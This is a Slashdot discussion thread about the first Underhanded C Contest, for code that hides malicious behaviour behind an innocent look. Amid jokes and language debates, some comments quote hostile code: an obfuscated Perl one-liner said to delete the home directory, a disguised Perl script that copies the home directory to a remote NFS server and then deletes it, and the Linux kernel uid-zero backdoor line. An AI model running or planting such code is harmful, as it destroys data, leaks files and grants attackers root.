The First Annual Underhanded C Contest

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

Comment removed

[account_deleted]

Comment removed based on user account deletion

This will work

[The+Original+Yama]

People will do anything for beer! Who needs speech when you're gulping down a cold lager?

Re:This will work

[isny]

Based on past experience, free beer is usually the first step toward free speech.

Re:This will work

[hostyle]

Moderation nazi!

in other words...

[beta-guy]

kill the brain cells that made innocent looking malicous code :P

Re:in other words...

[grammar+fascist]

On a more serious note - they should rethink their prize. Not everyone drinks beer, and there are plenty of talented programmers who avoid it completely. In fact, the ones who do probably have more working brain cells to throw at the problem.

Yes, I know that must come as a shock, and most people here probably won't believe me...yet it's true.

(And just to head off the inevitable nutcase looking for a Score:5, Funny: no, replacing the prize with free pr0n isn't going to cut it. :p)

Re:in other words...

[crisco]

Ah, but any other self respecting, non beer drinking programmer will recognize its value as currency among lesser mortals. Even simply passing the prize along to lesser mortals can induce acts of goodwill.

Re:What are the legal ramifications of this?

Pussy.

Re:What are the legal ramifications of this?

[spellraiser]

RTFA, please.

The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.

The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.

I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.

Beer? Phui!

[devross]

The object is to hide evil functionality that survives visual inspection of the source.

The prize is world domination!

It's a bad idea

Count on the likes of Sun, Microsoft, and anyone else selling a non-C language to pounce on this as a marketing opportunity.

C is a superb language. Why besmirch its reputation with a contest to make it seem as untrustworthy as possible?

Re:It's a bad idea

[Catamaran]

C gives you just enough rope to hang yourself.

Java gives you a polished floor on which you can slip and break your neck.

C++ gives you a thermo-nuclear device.

Re:It's a bad idea

[dcam]

You accidently create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical assistance is impossible since you can't tell which are bitwise copies and which are just pointing at others and saying "That's me, over there."

Source

I think I might win

[numbware]

#include
main()
{
printf("Hello World");
}

Seemingly harmless, right? Wrong. It's still in devlopment, but think about it. You should have to greet the world before you destroy it. :)

Re:What are the legal ramifications of this?

[Cryptacool]

What?

Are you serious? Entrapment is an undercover cop asking you if you want to buy drugs, then when you say no, he tries to persuade you and suceeds, possibly becuase you just want him to go away.

It's really not that easy for something to qualify as entrapment, also consider that writing malicious code isnt illegal, it's free speech and no different then writing a book that urges people to do something malicious, not at all illegal.

But no please, keep thinking everything is illegal and dont bother doing anything it makes it easier to actually make it illegal.

Re: This year's challenge

[ErichTheWebGuy]

Any open-source steganography programs

Why, yes! http://sourceforge.net/projects/steghide/

Re:What are the legal ramifications of this?

[anthony_dipierro]

The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes.

What computer crimes would be broken?

Frankly, I won't participate in this contest considering the current legal state of America.

No, you won't participate because of yor current state of paranoia over the legal state of America.

like this?

[LiquidCoooled]

#include stuff.h
void main()
{
/* nothing / */ /* to see / * here */
/* whats * / challenging / * about */
/* this */ /* there / is no */ evil /*
screensaver(); * function */ /* here
anyone that thinks there is * / needs */
/* their / * / eyes testing */ ();
}

585

Re:like this?

[Dun+Malg]

Nice idea, but it doesn't look innoucuous. It looks like a trick. I think the contest is for code the equivalent of a razor blade in a nice looking apple, rather than a razor blade hidden in a pile of clearly marked rat poison.

Re:Indeed. This could be a field day for Java and

[bcmm]

RTFA. The idea is to hide the malicious functions so that the source code looks innocent.

Attack the Compiler

[LionKimbro]

Why attack the source code when you can instead attack the compiler?

You need only attack the compiler, or the linker, or the interpreter.

Re:Attack the Compiler

[derek_farn]

For all you could possibly want to know about C, and more, check out this book (8M pdf). Those who want pure, uncommentaried, standard words can find them here.

Re:Attack the Compiler

[LionKimbro]

Yes, quite right.

I guess the thing is: What we're really concerned about here, (if I may project a little,) is voting software.

In those cases, they're probably not going to say, "download the compiler from a random site on the net." In fact, it's probably going to be very hard to control the people who compile the software, and even harder to control the people who compile the compiler. At some point, somebody's going to get the compiler, and they're going to get it from some specified place.

If it's a secret place, then the vote is determined by whoever controls that secret place. If it's a public place, well- that's something to think about.

Maybe we should have a Federal list of 100 places to get the compiler from. Or a thousand places. However it is done, we want to make it more expensive to buy the vote than the vote is worth.

Here you go

[titzandkunt]

Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

#define void int

Hours & hours of irritation & confusion!

T&K.

Re:Here you go

I actually did something like that once, for reasons that had nothing to do with obsfucation.

You see, I had to write some kind of simulation program that required a huge array of numbers. I wasn't sure whether to use "long int", to avoid overflow, or "short int", to avoid wasting memory. So I thought, "OK, I'll use a typedef, and so if I pick the wrong type, I can easily change it later."

But I was afraid that, out of habit, I would accidentally use "int" instead of my typedef. So I "temporarily" added "#define int ERROR" to my code.

Unfortunately, by the time I got around to compiling "int main()", I had completely forgotten about that #define, and couldn't figure out where the compile error was coming from.

Re:What are the legal ramifications of this?

[bighoov]

Can you even breathe in that tinfoil cocoon?

Story is just plain bad

[typical]

Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discrminiate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

Yeah, I just flip the "+good +bad -malicious" flags on javac when I want to trust code. Come on, that's ridiculous.

This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today" (I dunno, who can run nmap the longest?)

There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

The number of *interesting* security stories that could have challenged people and been useful is legion. "Can we have a system that is unbreakable and does X", (followed by the inevitable followup posts where people punch holes in the design) or other things. You could have asked "How can OSS projects avoid allowing malicious code being sumitted?", which would have started an interesting set of threads from people who work on proof-carrying code, would have taught readers something, and maybe provided improved security for the world at large. Instead, we're going to see a handful of bad, obfuscated C, and a bunch of halfassed arguments against C and OSS, neither of which has much connection with reality. There will be some language arguments, where someone says "we should use [LANGUAGE_WITH_BOUNDSCHECKING]", some security guy that will point out that this doesn't begin to avoid stopping malicious code, someone will make some stupid arguments about how their favorite OS is more secure than anyone else's, we'll get some rehash of NX features that have been done time and time again on Slashdot...seriously, goddammit. The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day is the day I jump ship.

Re:Story is just plain bad

[schotter]

"The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"

Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.

(Or there's always ars for CS stuff, but they're hardly a /. knockoff.)

Diebold

[jay95]

I nominate Diebold!
Now if only we can get them to enter their code in the contest...

Re:Diebold

[ceejayoz]

Pfft.

It's supposed to survive inspection, remember. giveElectionToTheRepublican() is underhanded, but it probably won't survive inspection. ;-)

Re:Seems a bit like those hacking contests

[numbski]

This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'

Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight, then it is far more dangerous. :)

I mean I could do something like this:

# When do you want it done?
$today="sudo";
$yesterday="su -c";

# Define our globals
$superman="ls";
$wonderwoman="rm"
$batm an="cp";
$aquaman="mv";

#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
$defeats="-s";

#define some targets
$your_mom="/";
$your_dad="/usr";
$your_ sister="~";
$your_teacher="/bin";
$hell="/dev/nu ll";
$heaven="/dev/random";
$skyhigh="nfs://myse rver/myhome";

#....later, back at Superfriends Headquarters

`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";

The superfriends save the day again.

Why?

[simulacrum25]

Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

Re:Why?

[Nf1nk]

To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
It is sort of like the computer version of a bomb squad.

Re:Why?

[Xcott+Craver]

Who is behind this and what is their motivations?

Is Google down? Okay, I updated the faq to tell you who we are.

Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerly hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.

Xcott

Re:Why?

[Frank+T.+Lofaro+Jr.]

Remember the recent Linux contamination

Something like:

if (blah || blah || uid=0) {
blah;
} ...

Re:Why?

[iluvcapra]

Methinks the poster refers to this, wherein some as yet uinidentifed party inserted a line into the kernel sources on the CVS repository.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

if these random options are passed, and the uid of the "current" struct is 0, then do the block, right? 8^o Fortunately, some sharp programmers caught this before those files got integrated back into the kernel, but who knows what the future may bring.

Re:SxE anyone???

[Hatta]

The prize is beer.

What if someone in the straight edge crowed wins?

They can give the beer to me.

Here's my entry:

[stinky+wizzleteats]

title Windows
root (hd0,0)
chainloader +1

Now where's my beer?

Diebold Hiring the winner!

[tvlinux]

Help Wanted:
Diebold needs new programmers. If you have what it takes to hide "winning" code in our election machines. Apply to Diebold Careers

Re:Indeed. This could be a field day for Java and

[Xcott+Craver]

Correct, making it look valid is the main purpose of the contest.

Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.

That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.

Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.

Xcott

Cheating?

[Maxwell'sSilverLART]

Am I required to submit original source code, written by me, or can I merely submit the leaked Windows source, and thus be assured of victory?

Would the Windows source code count?

[Sniper_Peabody]

It looks innocent but is about as evil as it gets.

Subtlety

[Dirtside]

The prize is beer.

...but the beer is poisoned!

Re:Subtlety

[RPI+Geek]

Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.

I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.

An example from years ago

[exp(pi*sqrt(163))]

There was a bug in the Watcom compiler for DOS many years ago. As a bug report I sent them a piece of code something like:

char *s = "Fortune coookie";
int *p = (char *)s;
for (i = 0; i<4; ++i) {
putchar(((char *)p)[i]);
}

Looks innocent enough. But actually it actually printed an obscenity. There was a bug in the pointer addition code generated by the compiler so that even though (char *)p was a pointer to type char it still used sizeof(int) to index into the array and so it printed every 4th character. (And that explains why I used three o's.)

Re:An example from years ago

[exp(pi*sqrt(163))]

It was for DOS4GW but I think you're being pedantic.

Some dude from Microsoft is gonna win...

[swillden]

He'll submit the source code to IE.

When will we see this pop up in the real world?

[creative_Righter]

Every year, we will propose a challenge to coders to solve a simple data processing problem, but with covert malicious behavior. Examples include miscounting votes, shaving money from financial transactions, or leaking information to an eavesdropper. The main goal, however, is to write source code that easily passes visual inspection by other programmers.

Oh dear, now we're rewarding people for writing actual malicious code that is designed to pass visual inspection from other programmers.

When these sort of tricks will show up eventually in actual voting machines or the gigantic corpus of finincial code that's been hacked together?

Or when will we start to find the underhanded tricks in things we use?

here's my entry

[thdexter]

#include <notavirus.h>
#include <seriouslyitisnt.h>

So long as they don't check notavirus.h I think I'm in the clear for visual inspection.

easy

[RailGunner]

The Windows Auto Blue screen... (yes, even XP still blows up on this):

int main (){
for (int i = 0; i < 100000; i++)
printf ("\t\t\b\b\b\b\b");
}

how's this?

[spongman]

int main () { WinExec ("iexplore.exe"); }

Re:how's this?

It's Internet Explorer. He's assuming the computer will be compromised before it would reach the return statement.

Re:how's this?

[Rei]

That's not very sneaky - it looks downright malicious. At the very least, who would run a program that launches a new fsck every five seconds? Even if the fs was read-only, you'll bring your system to a crawl in no time.

What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").

for (int x=0; xwidth; x++)
{
const int next_x=(x+1==width ? 0 : x+1);
const int prev_x=(x-1==-1 ? width-1 : x-1);
for (int y=0; yheight; y++)
{
const int next_y=(y+1==height ? 0 : y+1);
const int prev_y=(y-1==-1 ? height-1 : y-1);

const RGB point1 = picture[prev_x][prev_y];
const char point1_r = point1.r / 9;
const char point1_g = point1.g / 9;
const char point1_b = point1.b / 9;

const RGB point2 = picture[x][prev_y];
const char point2_r = point2.r / 9;
const char point2_g = point2.g / 9;
const char point2_b = point2.b / 9; // Etc - continue for 9 points from prev_x to next_x, prev_y to next_y

const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;

next_picture[x][y].r=dest_r;
next_picture[x][y].g=dest_g;
next_picture[x][y].b=dest_b;
}
}

In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.

If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities. :) I can't wait to see the results.

Re:Indeed. This could be a field day for Java and

[argent]

That'll make it a real challenge, since the designers of Java made an effort to make it difficult to write malicious code in the first place.

Actually, that's not really the case... not for the kind of "malicious code" that they're talking about here. They're not talking about "getting out of the sandbox", they're talking about "hiding information in the output". It's actually a lot easier to hide this kind of "malicious code" in an object-oriented language because you can play games with the namespace.

Re:There you programmers go again...

[bennomatic]

No, not seriously. I was just reading an article on the Patriot Act, though, and was thinking about how the masses--the same ones who are willing to accept that using BitTorrent is equivalent to terrorism--might see this sort of endeavor.

Linux Kernel Backdoor Attempt

[Johnny+Hardcore]

This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

The attempt was trying to insert

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).

Re:Beer

[spauldo]

They used to use the back section of planes to make ice cream (the cold and vibration from the propeller planes was perfect for it). It was air force tradition for quite some time.

It really just depends on what kind of plane you're talking about. I'm sure there's areas on even modern large-body jets where there's an uninsulated section large enough for a keg.

C is an awful language

[Urusai]

You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.

Re:C is an awful language

[jejones]

Well...

C is good for what it was first used for: writing Unix. At least initially, it was mimimalistic; orthogonality took a back seat to ease of implementation. (See Gabriel's classic essay for details.)

(It's certainly not flawless. Any language that needs a utility like cdecl to make declarations understandable has problems, and there should've been a Boolean type from the beginning. It would be nice if char (which should be whatever represents a glyph on the target system) weren't conflated with short short int. Basically, if C were in your back yard, it would be declared an "attractive nuisance.")

I think the authors of The Art of Unix Programming wisely recognize that C, like any other tool, should be used only where appropriate. (Sorry if that's tautological, but I can't think of a better way to put it.)

So The Hard Part Is To

[Master+of+Transhuman]

"write clear, readable, innocent-looking C code", right?

Wow, nobody's going to win this one.

Re:If crashing is "malicious behavior"

[proverbialcow]

doesn't that make basically all c code underhanded?

Nope. Only the code that includes

#include <windows.h>

*ducks*

Obligatory simpsons paraphrase

[Sentry21]

Programmer: 'Take this source code, but beware! It carries a terrible curse!'
Judge: 'That's bad.'
Programmer: 'But it's optimized for PowerPC!'
Judge: 'That's good!'
Programmer: 'PowerPC is also cursed.'
Judge: 'That's bad.'
Programmer: 'But you get your choice of operating systems!'
Judge: 'That's good!'
Programmer: 'The operating systems run on Intel.' *pause* 'That's bad.'
Judge: 'Can I go now?'

You're just not used to it.

[Tyler+Durden]

Problems: difficult to compile

A picky compiler is a blessing, not a curse. It's much easier to identify and fix compile errors than run-time errors.

difficult to convert to better languages (thank you preprocessor)

Meaningless troll.

encourages obfuscation

Unless the compiler is literally holding a gun to your head, this is meaningless. In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings.

Tacked on? If you don't like the way constructs are set up then fine, that's your opinion. But if you read The C Programming Language you can tell that every single construct was scrutinized over for the proper balance of efficiency (why it makes sense to pass array parameters as pointers and structs as copies) and consistency (why data types are declared the way they are. Declaration and use of data is made to match.) Do you honestly believe the creators/first users of C, some of the greatest programmers who ever lived, really said, "Ahhh, fuck it. Let's just throw something together," when designing their own programming tools?

Most people who don't like C are really just saying they don't like low-level programming because that's what it was designed for, and that's what it's perfect for. Too many newbie programmers get used to some modern, flash-in-the-pan, all-things-to-all-people languages and when they are faced with the challenges of low-level languages rashly conclude that it's the language's fault they're having problems.

C is the perfect language for the job it was designed for. The same cannot be said for most more modern languages.

Re:You're just not used to it.

[Tyler+Durden]

No flame. There are problems with C, I'll grant that. I don't know if the problem with the pre-processor is that it's too powerful or by convention it is depended on too much. Unfortunately, in some places it requres #defines where a const variable would be better. That and macros for functions where a simple inline keyword would help tremedously. Of course, these have been addresses in C++ and (I think) C99.

I'm not sure about strings. With the really low level stuff like OS development, I can see the case for just contiguous characters terminated by a NULL character. Otherwise it's not so hot.

But I still maintain that C works extremely well for what it was created for. I mean, how long did it take before it needed to change as opposed to C++ that becomes more complex by the hour? (I really have a love/hate attitude towards C++. I think it's a horrible language to match the needs of a horrible world. Then again, I should look more into Objective C.)

C99 addresses a lot of valid concerns with the language, though. That and D sounds promising.

Re:You're just not used to it.

[Dun+Malg]

2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

Clarity. All the data types in C are intended to be clear. It's only a single step up from assembly, really. C handles strings the same way assembly does: it eats bytes sequentially from an array, and it's up to the programmer to tell the program when it's had enough. Data handling in C is a virtually transparent veneer of abstraction from pointer arithmetic. A string data type with length encoded into it would require special handling, and C just don't play that game. C is all about pounding raw bytes and twiddling naked bits. If you want fancy meta-data, you're using the wrong language. Try C++ of Java.

Re:You're just not used to it.

[syle]

. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

I think you're confusing C with a high-level language. It doesn't give you lists, associative arrays, or strings because those are high-level data types and C is a low-level language. Your complaints are like saying the biggest problem with a car is you can't drive it on water -- they display a fundamental misunderstanding of the subject.

Re:You're just not used to it.

[csirac]

I think it is very odd you can't believe we're still using C in operating systems. What the other language are we going to use for this task?

Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds? And how exactly is Python, LISP, or any other interpreted/dynamic runtime compiled language going to be used to write a task scheduler or memory managment system worthy of being used in an OS kernel or embedded MCUs with barely 16KiB RAM?

I think you're quite bitter about having to use C for writing applications, which I can perfectly understand. As for what C is actually MEANT for, it does the job quite well. And yes, the preprocessor issues suck, and it would be nice to have Pascal strings, but there really is no alternative to C that I have seen for low-level programming. It makes computer science purists who think everyone should program in Haskell or LISP feel dirty, but it does the job very well. It sure beats writing directly in ASM.

Service Pack fixes it, but it's documented

[edalytical]

http://support.microsoft.com/?kbid=311486

I think this is more appropriate

[btarval]

Almost. All it takes is a one-line change to make this malicious program into what should be the motto of this contest:

main() { printf("Goodbye World!\n"); }

Re:So are you very, very good or very, very bad?

[anno1602]

Writing code of that quality that looks like it does what it's supposed to do, while actually doing something subtly different, sounds like a very difficult challenge to me.

Programmers do that every day. It's called a "bug". Now, doing something subtly different and controlling what the subtly different thing actually is, that is a challenge.

Vectors

[headkase]

Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
A way to automatically find this would be to use an execution tracer that would alert you when the programs point of execution "left" it's source code or allowed system api's.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:What are the legal ramifications of this?

[Genrou]

Not the same paranoia of the previous post, but paranoia anyway. But the first thing that I thought was something like: "oh, so, this contest will show that malicious code can be inserted in open source and it will be very difficult to spot?" -- there are at least one software company that will like to point to it. Then again, I might actually be paranoid.

Volunteer to help out!

[real+gumby]

Clearly most of us should be submitting innocuous code to help camouflage the actual malign entries. That will make it harder for the judges to find badness. If you know that all the entries have some badness, then you'll look really hard. If you don't know which ones do, your checking gets worse.

This would make the test more like the real world too.

Re:I'll take the bait

[Dwonis]

Finally, AFAICR C doesn't support the implicit return at the end of main that C++ does, so there's a missing return statement. (I may be wrong about the third one if it was fixed in C99; I don't have a copy of the revised standard handy.)

You are correct. This is from ISO/IEC 9899:1999(E):

5.1.2.2.3 Program termination 1 If the return type of the main function is a type compatible with int, a return from the initial call to the main function is equivalent to calling the exit function with the value returned by the main function as its argument; reaching the } that terminates the main function returns a value of 0. If the return type is not compatible with int, the termination status returned to the host environment is unspecied.

(emphasis added)